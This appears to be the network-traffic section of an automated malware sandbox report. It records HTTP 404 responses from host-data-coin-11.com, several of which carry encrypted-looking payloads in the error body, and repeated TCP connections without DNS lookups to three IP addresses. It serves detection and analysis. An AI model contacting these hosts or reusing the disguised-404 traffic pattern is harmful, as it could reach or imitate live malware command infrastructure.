                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 45 0c a7 35 f4 eb 66 c1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevE5fdP0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 69 07 f3 ad 89 a6 e4 1e b6 1b 91 67 a1 57 51 93 00 fd e0 26 f3 22 54 0d f3 ab 93 4b e2 16 87 1e 89 af 73 c6 3d ee b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OOigWQ&"TKs=~0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 69 07 f3 ad 89 a6 e4 1e b6 1b 91 67 a5 5d 5a 86 08 f0 ea 21 e5 38 1a 1b bf f5 d5 5f fe 04 c6 16 89 b9 79 d9 7d be f8 d1 4f 54 a4 ef 1f 72 a2 eb e9 76 a7 d1 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 4cI:82OOig]Z!8_y}OTrv0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 53 dc 43 d2 fb 2f 82 2b eb ac 91 54 2f e0 b4 41 29 e3 b3 b7 6d f3 9d b8 51 ad 74 94 cf 32 4a 58 37 0b 4a dd bb 71 bd eb 1c 92 ac df 0d 0a 30 0d 0a 0d 0a Data Ascii: 60I:82OB%,YR("XSC/+T/A)mQt2JX7Jq0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 83 49 10 65 1e ff a7 8a bb a6 14 b7 1d dd 61 b2 45 4c da 01 f5 e7 3a ae 24 50 0a f3 e1 8c 1f b4 23 c7 17 9e ab 0d 0a 30 0d 0a 0d 0a Data Ascii: 39I:82OIeaEL:$P#0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:24:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
